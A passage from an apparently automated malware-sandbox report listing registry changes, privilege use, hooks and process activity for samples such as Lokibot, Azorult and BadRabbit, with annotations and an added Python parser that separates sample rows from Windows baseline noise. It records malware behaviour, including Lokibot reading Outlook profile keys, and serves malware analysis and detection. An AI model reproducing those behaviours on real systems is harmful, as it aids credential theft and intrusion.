13000000000000000000000020000000100000000000000001000000010700005e010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
00000000000000000000000000000000000000000000000000000000000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" setup.exe Set value (int) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" explorer.exe -
Modifies data under HKEY_USERS 16 IoCs
These are LogonUI.exe writing lock-screen colour and DWM settings under the .DEFAULT profile and svchost.exe updating a MuiCache language entry: logon-screen theming, not sample activity.
Processes: LogonUI.exe, svchost.exe
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | LogonUI.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | svchost.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | LogonUI.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | LogonUI.exe
-
Modifies registry class 64 IoCs
All 64 writes are explorer.exe ShellBag/BagMRU view state, SearchUI.exe (Cortana) DOMStorage counters and one SystemSettings.exe key creation: routine shell activity, useful only as a timeline of which folders were browsed during the session.
Processes: explorer.exe, SearchUI.exe, SystemSettings.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15 | explorer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell | explorer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\SniffedFolderType = "Generic" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | explorer.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 0700000006000000050000000400000003000000020000000100000000000000ffffffff | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "56" | SearchUI.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\14\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\5\NodeSlot = "16" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\LogicalViewMode = "1" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\GroupView = "0" | explorer.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | explorer.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | explorer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" | explorer.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202020202020202 | explorer.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\5\0\MRUListEx = ffffffff | explorer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix | SearchUI.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState | SearchUI.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616209" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" | SearchUI.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | explorer.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana | SearchUI.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\4\MRUListEx = ffffffff | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\FFlags = "18874369" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\IconSize = "16" | explorer.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings | SystemSettings.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0 | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\3\NodeSlot = "14" | explorer.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 050000000400000003000000020000000100000000000000ffffffff | explorer.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\18\Shell\SniffedFolderType = "Generic" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | SearchUI.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = (binary value not preserved in this copy) | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\3 | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\15\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\5\0\NodeSlot = "17" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\20\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana | SearchUI.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\19\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" | explorer.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9}\Mode = "4" | explorer.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23" | SearchUI.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\Shell\KnownFolderDerivedFolderType = "{57807898-8C4F-4462-BB63-71042380B109}" | explorer.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\5\MRUListEx = 00000000ffffffff | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\17\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} | explorer.exe
-
Modifies registry key 1 TTPs 3 IoCs
-
NTFS ADS 1 IoCs
The colon in this path comes from the WMI moniker winmgmts:\localhost\root\CIMV2 that has been appended to a ProgramData path, so this is most likely a false positive of the alternate-data-stream heuristic (which keys on a colon in the file name) rather than a real ADS write.
Processes: taskhostw.exe
description | ioc | process
File opened for modification | C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2 | taskhostw.exe
-
Runs .reg file with regedit 2 IoCs
Processes: regedit.exe
pid | process
4196 | regedit.exe
3860 | regedit.exe
-
Runs net.exe
-
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes: explorer.exe, WINWORD.EXE
pid | process
1824 | explorer.exe
1040 | WINWORD.EXE
1040 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: chrome.exe, taskmgr.exe
pid | process | events
860, 2736, 3884, 2064, 1488, 3176, 888, 1232, 1292, 3532, 3664 | chrome.exe | 2 each
1244 | chrome.exe | 4
1896 | taskmgr.exe | 33
2980 | taskmgr.exe | 5
-
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
Processes: taskmgr.exe, explorer.exe, taskhostw.exe
pid | process
2980 | taskmgr.exe
1824 | explorer.exe
5200 | taskhostw.exe
-
Suspicious behavior: LoadsDriver 4 IoCs
Processes: (image name not recorded)
pid | process | events
624 | (not recorded) | 4
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
Processes: chrome.exe
pid | process | events
2736 | chrome.exe | 16
-
Suspicious behavior: SetClipboardViewer 1 IoCs
Processes: Conhost.exe
pid | process
4992 | Conhost.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Most of the 64 events are routine: taskmgr.exe and SystemSettings.exe enabling the privileges they normally use, firefox.exe and the two taskkill.exe instances taking SeDebugPrivilege, and explorer.exe toggling SeShutdownPrivilege/SeCreatePagefilePrivilege 20 times. The entries worth following up are Lokibot.exe (pid 3620) and helper.exe (pid 4156) enabling SeDebugPrivilege, and rutserv.exe (the file name used by the Remote Utilities remote-access server) enabling SeDebugPrivilege (pids 3952, 4812) and SeTakeOwnershipPrivilege plus SeTcbPrivilege (pid 4352).
Processes: taskmgr.exe, helper.exe, SystemSettings.exe, firefox.exe, Lokibot.exe, rutserv.exe, explorer.exe, taskkill.exe
description | pid | process | events
Token: SeDebugPrivilege | 1896 | taskmgr.exe | 1
Token: SeSystemProfilePrivilege | 1896 | taskmgr.exe | 1
Token: SeCreateGlobalPrivilege | 1896 | taskmgr.exe | 1
Token: 33 | 1896 | taskmgr.exe | 1
Token: SeIncBasePriorityPrivilege | 1896 | taskmgr.exe | 1
Token: SeDebugPrivilege | 2980 | taskmgr.exe | 1
Token: SeSystemProfilePrivilege | 2980 | taskmgr.exe | 1
Token: SeCreateGlobalPrivilege | 2980 | taskmgr.exe | 1
Token: SeDebugPrivilege | 4156 | helper.exe | 2
Token: SeShutdownPrivilege | 4308 | SystemSettings.exe | 2
Token: SeCreatePagefilePrivilege | 4308 | SystemSettings.exe | 2
Token: SeDebugPrivilege | 4324 | firefox.exe | 2
Token: SeDebugPrivilege | 3620 | Lokibot.exe | 1
Token: SeDebugPrivilege | 3952 | rutserv.exe | 1
Token: SeDebugPrivilege | 4812 | rutserv.exe | 1
Token: SeTakeOwnershipPrivilege | 4352 | rutserv.exe | 1
Token: SeTcbPrivilege | 4352 | rutserv.exe | 2
Token: SeShutdownPrivilege | 1824 | explorer.exe | 20
Token: SeCreatePagefilePrivilege | 1824 | explorer.exe | 20
Token: SeDebugPrivilege | 3516 | taskkill.exe | 1
Token: SeDebugPrivilege | 1392 | taskkill.exe | 1
-
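The rows in this report are flattened "description ioc process" triples with no delimiter between the columns, which makes them awkward to grep once a run has hundreds of them. The following added example (not part of the report or of the sandbox vendor's tooling) parses that row shape for the three sections where the sample names appear, "Drops file in Windows directory", "Checks processor information in registry" and this "Suspicious use of AdjustPrivilegeToken" section, and separates the dropped samples from the Windows, Office and browser components that make up the sandbox baseline. The sample rows are copied verbatim from those sections; the baseline image set, and the assumption that the process column is a single token ending in .exe or .dll, are this example's own.

```python
"""Parse the flattened "description ioc process" rows of this sandbox report and
pull out the rows that do not come from Windows, Office or browser components.

Added example, not part of the report or of the sandbox vendor's tooling.  It
handles the row shapes seen in the "Drops file in Windows directory", "Checks
processor information in registry" and "Suspicious use of AdjustPrivilegeToken"
sections; the baseline set of expected image names is an assumption for this run.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# One row = <description> <ioc, which may contain spaces> <process image>.
# Assumption: the process column is a single token ending in .exe/.dll, and a
# row is followed either by the next description or by end of text; that is
# what lets the non-greedy ioc group stop in the right place.
_ROW = re.compile(
    r"(?P<desc>File opened for modification|File created|Key value queried|Key opened|Key created|Token:)"
    r"\s+(?P<body>.+?)\s+(?P<proc>\S+\.(?:exe|EXE|dll|DLL))"
    r"(?=\s+(?:File |Key |Token:)|\s*$)"
)

# Images expected in this sandbox image's baseline (shell, WER, Office and the
# two browsers).  rundll32.exe is deliberately *not* here: it is a Windows
# binary, but in this run it is the BadRabbit loader and must stay visible.
BASELINE_IMAGES = {
    "explorer.exe", "taskmgr.exe", "systemsettings.exe", "searchui.exe",
    "shellexperiencehost.exe", "firefox.exe", "chrome.exe", "winword.exe",
    "werfault.exe", "logonui.exe", "svchost.exe", "taskhostw.exe", "conhost.exe",
}


@dataclass(frozen=True)
class Row:
    desc: str
    ioc: str                    # file path, registry key, or privilege name
    process: str
    pid: Optional[int] = None   # only Token rows carry a pid


def parse_rows(text: str) -> List[Row]:
    """Split one flattened section body into Row records."""
    rows = []
    for m in _ROW.finditer(text):
        desc, body, proc = m.group("desc", "body", "proc")
        if desc == "Token:":
            priv, pid = body.rsplit(None, 1)     # body looks like "SeDebugPrivilege 1896"
            rows.append(Row("Token", priv, proc, int(pid)))
        else:
            rows.append(Row(desc, body, proc))
    return rows


def unexpected_processes(rows: List[Row]) -> List[str]:
    """Image names that are not in the baseline, sorted case-insensitively."""
    names = {r.process for r in rows if r.process.lower() not in BASELINE_IMAGES}
    return sorted(names, key=str.lower)


def privileges_by_process(rows: List[Row]) -> Dict[str, List[str]]:
    """Distinct privileges enabled per image, from the Token rows only."""
    privs: Dict[str, set] = defaultdict(set)
    for r in rows:
        if r.desc == "Token":
            privs[r.process].add(r.ioc)
    return {p: sorted(s) for p, s in privs.items()}


# Rows copied verbatim from the three sections named above (a subset of each).
REPORT_ROWS = (
    r"File created C:\Windows\rescache\_merged\1601268389\1361672858.pri taskmgr.exe "
    r"File opened for modification C:\Windows\infpub.dat rundll32.exe "
    r"File created C:\Windows\cscc.dat rundll32.exe "
    r"File created C:\Windows\Nope.txt RedEye.exe "
    r"File created C:\Windows\dispci.exe rundll32.exe "
    r"File created C:\Windows\infpub.dat BadRabbit.exe "
    r"Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 InfinityCrypt.exe "
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe "
    r"Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString GandCrab.exe "
    r"Token: SeDebugPrivilege 1896 taskmgr.exe "
    r"Token: SeDebugPrivilege 3620 Lokibot.exe "
    r"Token: SeTcbPrivilege 4352 rutserv.exe"
)

if __name__ == "__main__":
    rows = parse_rows(REPORT_ROWS)
    for name in unexpected_processes(rows):
        for r in rows:
            if r.process == name:
                print(f"{name:<18} {r.desc:<28} {r.ioc}")
    print(privileges_by_process(rows))
```

The regex relies on the fixed vocabulary of the description column to find row boundaries, which is why a value such as "Update Revision" (a registry value name containing a space) is still attributed to the right row. Anything with a blank process column, like the LoadsDriver rows above, will not match and has to be handled separately.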
Suspicious use of FindShellTrayWindow 64 IoCs
Processes: chrome.exe, taskmgr.exe
pid | process | events
2736 | chrome.exe | 58
1896 | taskmgr.exe | 6
-
Suspicious use of SendNotifyMessage 64 IoCs
Processes (pid, process):
- 2736 chrome.exe (repeated)
- 1896 taskmgr.exe (repeated)
Suspicious use of SetWindowsHookEx 64 IoCs
Processes (pid, process; several entries repeat):
- 1200 BabylonNG_setup.exe
- 1264 setup.exe
- 4324 firefox.exe
- 4308 SystemSettings.exe
- 2816 Azorult.exe
- 4140 wini.exe
- 5056 winit.exe
- 3952 rutserv.exe
- 4832 rutserv.exe
- 4728 cheat.exe
- 4864 ink.exe
- 4812 rutserv.exe
- 4380 taskhost.exe
- 4352 rutserv.exe
- 4620 P.exe
- 5096 R8.exe
- 3456 SearchUI.exe
- 3312 ShellExperienceHost.exe
- 3920 winlogon.exe
- 5200 taskhostw.exe
- 1824 explorer.exe
- 7020 winlogon.exe
- 948 audiodg.exe
- 4628 MicrosoftHost.exe
- 1040 WINWORD.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes (source pid/process wrote to memory of target pid/process; entries repeat):
- PID 2736 chrome.exe wrote to memory of 2740 chrome.exe
- PID 2736 chrome.exe wrote to memory of 3708 chrome.exe
- PID 2736 chrome.exe wrote to memory of 860 chrome.exe
- PID 2736 chrome.exe wrote to memory of 2884 chrome.exe
Views/modifies file attributes 1 TTPs 6 IoCs
Processes (pid, process):
- 6036 attrib.exe
- 6096 attrib.exe
- 3732 attrib.exe
- 4672 attrib.exe
- 5484 attrib.exe
- 4800 attrib.exe
outlook_office_path 1 IoCs
Processes:
- Lokibot.exe: Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
outlook_win_path 1 IoCs
Processes:
- Lokibot.exe: Key opened \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Processes (process tree; indentation shows nesting depth, each entry gives the image path, its command line and any signatures matched by that process)

- c:\windows\system32\svchost.exe
  cmd: c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
- c:\windows\system32\taskhostw.exe
  cmd: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
- C:\Windows\system32\DllHost.exe
  cmd: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
